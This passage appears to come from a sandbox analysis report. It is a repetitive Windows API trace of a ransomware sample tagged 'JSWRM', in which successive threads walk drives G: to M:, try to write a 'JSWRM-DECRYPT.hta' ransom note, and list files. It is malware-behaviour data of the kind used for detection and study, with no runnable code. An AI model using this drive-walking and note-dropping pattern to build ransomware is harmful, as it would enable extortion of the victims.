Size=0x20) returned 0x2412e0 [0058.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.339] CreateFileW (lpFileName="G:\\JSWRM-DECRYPT.hta" (normalized: "g:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.340] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.340] WriteFile (in: hFile=0xffffffff, lpBuffer=0x395c698, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x395c664, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x395c664, lpOverlapped=0x0) returned 0 [0058.340] CloseHandle (hObject=0xffffffff) returned 1 [0058.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.340] FindFirstFileW (in: lpFileName="G:\\*.*", lpFindFileData=0x395f720 | out: lpFindFileData=0x395f720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xcc80\x23\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.340] GetCurrentThreadId () returned 0xd2c [0058.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a678 | out: hHeap=0x1e0000) returned 1 [0058.340] GetLastError () returned 0x3 [0058.340] SetLastError (dwErrCode=0x3) [0058.340] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x229180 | out: hHeap=0x1e0000) returned 1 [0058.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 83 os_tid = 0xce8 [0058.341] GetLastError () returned 0x57 [0058.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.341] SetLastError (dwErrCode=0x57) [0058.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.342] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.345] GetFileAttributesW (lpFileName="H:\\JSWRM-DECRYPT.hta" (normalized: "h:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x3a9c57c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.349] CreateFileW (lpFileName="H:\\JSWRM-DECRYPT.hta" (normalized: "h:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.350] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.350] WriteFile (in: hFile=0xffffffff, lpBuffer=0x3a9c690, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x3a9c65c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x3a9c65c, lpOverlapped=0x0) returned 0 [0058.350] CloseHandle (hObject=0xffffffff) returned 1 [0058.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.350] FindFirstFileW (in: lpFileName="H:\\*.*", lpFindFileData=0x3a9f718 | out: lpFindFileData=0x3a9f718*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xcc80\x23\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.350] GetCurrentThreadId () returned 0xce8 [0058.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a600 | out: hHeap=0x1e0000) returned 1 [0058.350] GetLastError () returned 0x3 [0058.350] SetLastError (dwErrCode=0x3) [0058.350] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x229360 | out: hHeap=0x1e0000) returned 1 [0058.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 84 os_tid = 0x2ac [0058.351] GetLastError () returned 0x57 [0058.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.351] SetLastError (dwErrCode=0x57) [0058.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.355] GetFileAttributesW (lpFileName="I:\\JSWRM-DECRYPT.hta" (normalized: "i:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x3bdc604, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.359] CreateFileW (lpFileName="I:\\JSWRM-DECRYPT.hta" (normalized: "i:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.360] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.360] WriteFile (in: hFile=0xffffffff, lpBuffer=0x3bdc718, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x3bdc6e4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x3bdc6e4, lpOverlapped=0x0) returned 0 [0058.360] CloseHandle (hObject=0xffffffff) returned 1 [0058.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.360] FindFirstFileW (in: lpFileName="I:\\*.*", lpFindFileData=0x3bdf7a0 | out: lpFindFileData=0x3bdf7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xcc80\x23\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.360] GetCurrentThreadId () returned 0x2ac [0058.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4e0 | out: hHeap=0x1e0000) returned 1 [0058.360] GetLastError () returned 0x3 [0058.360] SetLastError (dwErrCode=0x3) [0058.360] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2291a0 | out: hHeap=0x1e0000) returned 1 [0058.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 85 os_tid = 0x7a4 [0058.361] GetLastError () returned 0x57 [0058.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.361] SetLastError (dwErrCode=0x57) [0058.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.365] GetFileAttributesW (lpFileName="J:\\JSWRM-DECRYPT.hta" (normalized: "j:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x3d1c2e4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.370] CreateFileW (lpFileName="J:\\JSWRM-DECRYPT.hta" (normalized: "j:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.370] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.370] WriteFile (in: hFile=0xffffffff, lpBuffer=0x3d1c3f8, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x3d1c3c4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x3d1c3c4, lpOverlapped=0x0) returned 0 [0058.370] CloseHandle (hObject=0xffffffff) returned 1 [0058.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.370] FindFirstFileW (in: lpFileName="J:\\*.*", lpFindFileData=0x3d1f480 | out: lpFindFileData=0x3d1f480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xcc80\x23\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.370] GetCurrentThreadId () returned 0x7a4 [0058.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a588 | out: hHeap=0x1e0000) returned 1 [0058.370] GetLastError () returned 0x3 [0058.370] SetLastError (dwErrCode=0x3) [0058.370] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2292a0 | out: hHeap=0x1e0000) returned 1 [0058.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 86 os_tid = 0xd04 [0058.371] GetLastError () returned 0x57 [0058.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.371] SetLastError (dwErrCode=0x57) [0058.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.375] GetFileAttributesW (lpFileName="K:\\JSWRM-DECRYPT.hta" (normalized: "k:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x3e5c4bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.380] CreateFileW (lpFileName="K:\\JSWRM-DECRYPT.hta" (normalized: "k:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.380] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.380] WriteFile (in: hFile=0xffffffff, lpBuffer=0x3e5c5d0, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x3e5c59c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x3e5c59c, lpOverlapped=0x0) returned 0 [0058.380] CloseHandle (hObject=0xffffffff) returned 1 [0058.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.380] FindFirstFileW (in: lpFileName="K:\\*.*", lpFindFileData=0x3e5f658 | out: lpFindFileData=0x3e5f658*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xcc80\x23\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.380] GetCurrentThreadId () returned 0xd04 [0058.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a690 | out: hHeap=0x1e0000) returned 1 [0058.380] GetLastError () returned 0x3 [0058.380] SetLastError (dwErrCode=0x3) [0058.380] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x229300 | out: hHeap=0x1e0000) returned 1 [0058.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 87 os_tid = 0x58 [0058.381] GetLastError () returned 0x57 [0058.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.381] SetLastError (dwErrCode=0x57) [0058.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.385] GetFileAttributesW (lpFileName="L:\\JSWRM-DECRYPT.hta" (normalized: "l:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x3f9c650, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.390] CreateFileW (lpFileName="L:\\JSWRM-DECRYPT.hta" (normalized: "l:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.390] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.390] WriteFile (in: hFile=0xffffffff, lpBuffer=0x3f9c764, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x3f9c730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x3f9c730, lpOverlapped=0x0) returned 0 [0058.390] CloseHandle (hObject=0xffffffff) returned 1 [0058.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.390] FindFirstFileW (in: lpFileName="L:\\*.*", lpFindFileData=0x3f9f7ec | out: lpFindFileData=0x3f9f7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.390] GetCurrentThreadId () returned 0x58 [0058.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a5d0 | out: hHeap=0x1e0000) returned 1 [0058.390] GetLastError () returned 0x3 [0058.391] SetLastError (dwErrCode=0x3) [0058.391] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x228fc0 | out: hHeap=0x1e0000) returned 1 [0058.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 88 os_tid = 0xd34 [0058.391] GetLastError () returned 0x57 [0058.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.392] SetLastError (dwErrCode=0x57) [0058.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.396] GetFileAttributesW (lpFileName="M:\\JSWRM-DECRYPT.hta" (normalized: "m:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x40dc6f8, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.396] RtlAllocateHeap 